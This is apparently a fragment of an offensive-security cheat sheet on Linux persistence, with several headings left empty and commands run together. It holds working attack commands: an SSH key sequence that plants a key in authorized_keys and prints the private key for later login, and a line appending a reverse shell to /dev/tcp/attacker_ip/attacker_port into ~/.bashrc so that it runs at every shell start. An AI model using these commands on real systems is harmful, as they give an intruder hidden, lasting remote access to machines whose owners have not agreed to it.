persistence
SSH Keys
ssh-keygen -t rsa -b 2048 -f ~/.ssh/id_rsa -N ""cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keysrm ~/.ssh/id_rsa ~/.ssh/id_rsa.pubssh-keygen -t rsa -b 2048 -f ~/.ssh/id_rsa -N ""; cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys; cat ~/.ssh/id_rsa; rm ~/.ssh/id_rsa ~/.ssh/id_rsa.pubCron Jobs
Environment Variables
echo 'bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1' >> ~/.bashrcAutoStart Applications
SUID Binaries
Web Shells
Shared Library
Last updated